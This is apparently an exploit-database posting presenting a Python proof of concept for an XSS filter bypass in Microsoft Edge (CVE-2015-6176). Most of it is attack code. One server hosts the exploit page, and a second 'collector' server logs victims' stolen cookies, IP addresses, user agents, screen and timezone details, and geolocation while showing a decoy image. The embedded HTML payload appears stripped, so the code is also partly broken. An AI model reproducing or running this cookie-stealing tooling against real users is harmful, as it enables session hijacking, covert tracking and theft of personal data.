# Titles: Microsoft Edge XSS Filter Bypass PoC # Author: nu11secur1ty # Date: 2025-07-18 # Vendor: Microsoft # Software: Microsoft Edge Browser # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6176 ## Description This Proof of Concept (PoC) demonstrates an XSS (Cross-Site Scripting) vulnerability bypass in Microsoft Edge's XSS filter. The vulnerability allows attackers to inject and execute malicious JavaScript despite Edge's built-in XSS protection mechanisms. This PoC works by crafting an HTML page that steals user cookies and sends them to an attacker-controlled collector server, bypassing Edge's filter. The collector server displays a large sea picture as a decoy, while logging stolen cookies, IP addresses, user agents, timestamps, and approximate geographic locations. This vulnerability is categorized as medium severity due to the potential for session hijacking and unauthorized actions performed with stolen cookies. # STATUS: MEDIUM VULNERABILITY [+]Exploit: ```pyton #!/usr/bin/python # nu11secur1ty CVE-2015-6176 import http.server import socketserver import socket import threading from urllib import parse import requests import datetime PORT = 8080 COLLECTOR_PORT = 9000 # HTML page with extended XSS exploit that sends lots of info via Image GET to collector HTML_CONTENT = b""" XSS Edge Bypass PoC

XSS Edge Bypass PoC

If this alert appears, XSS is executed.

""" # Collector page with large sea picture and centered message (Unicode allowed) COLLECTOR_PAGE = """ Collected

Thank you for visiting the collector page 🌊

""" class ExploitHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): if self.path in ('/', '/index.html'): content = HTML_CONTENT.replace(b"{LOCAL_IP}", local_ip.encode()).replace(b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode()) self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") self.send_header("Content-Length", str(len(content))) self.end_headers() self.wfile.write(content) else: self.send_error(404) class CollectorHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): parsed_path = parse.urlparse(self.path) if parsed_path.path == "/collect": query = parse.parse_qs(parsed_path.query) cookie = query.get("cookie", [""])[0] url = query.get("url", [""])[0] referrer = query.get("referrer", [""])[0] language = query.get("language", [""])[0] platform = query.get("platform", [""])[0] timezone = query.get("timezone", [""])[0] screen = query.get("screen", [""])[0] ip = self.client_address[0] user_agent = self.headers.get("User-Agent", "Unknown") timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") location = self.get_location(ip) if cookie: print(f"[{timestamp}] [+] Collected cookie: {cookie}") print(f" URL: {url}") print(f" Referrer: {referrer}") print(f" Language: {language}") print(f" Platform: {platform}") print(f" Timezone: {timezone}") print(f" Screen Resolution: {screen}") print(f" From IP: {ip}") print(f" User-Agent: {user_agent}") print(f" Location: {location}") print("-" * 50) # Save collected info to a file with open("collected_data.log", "a", encoding="utf-8") as f: f.write(f"[{timestamp}] Cookie: {cookie}\n") f.write(f" URL: {url}\n") f.write(f" Referrer: {referrer}\n") f.write(f" Language: {language}\n") f.write(f" Platform: {platform}\n") f.write(f" Timezone: {timezone}\n") f.write(f" Screen Resolution: {screen}\n") f.write(f" IP: {ip}\n") f.write(f" User-Agent: {user_agent}\n") f.write(f" Location: {location}\n") f.write("-" * 50 + "\n") self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") content = COLLECTOR_PAGE.encode('utf-8') self.send_header("Content-Length", str(len(content))) self.end_headers() self.wfile.write(content) else: self.send_error(404) def get_location(self, ip): # Use free IP info service; fallback gracefully if no internet try: resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3) if resp.status_code == 200: data = resp.json() city = data.get("city", "") region = data.get("region", "") country = data.get("country", "") loc = data.get("loc", "") return f"{city}, {region}, {country} (coords: {loc})" except Exception: pass return "Location lookup failed or unavailable" def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] except Exception: ip = "127.0.0.1" finally: s.close() return ip def run_exploit_server(): with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd: print(f"[*] Exploit server running at: http:// {local_ip}:{PORT}/index.html") httpd.serve_forever() def run_collector_server(): with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd: print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect") httpd.serve_forever() if __name__ == "__main__": local_ip = get_local_ip() try: print(f"[*] Your server IP is: {local_ip}") exploit_thread = threading.Thread(target=run_exploit_server, daemon=True) exploit_thread.start() run_collector_server() except KeyboardInterrupt: print("\n[!] Shutting down servers. Goodbye!") ``` # Video: [href](https://www.youtube.com/watch?v=T2YLrFsvXOc) # Source: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176) # Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) # Time spent: 03:35:00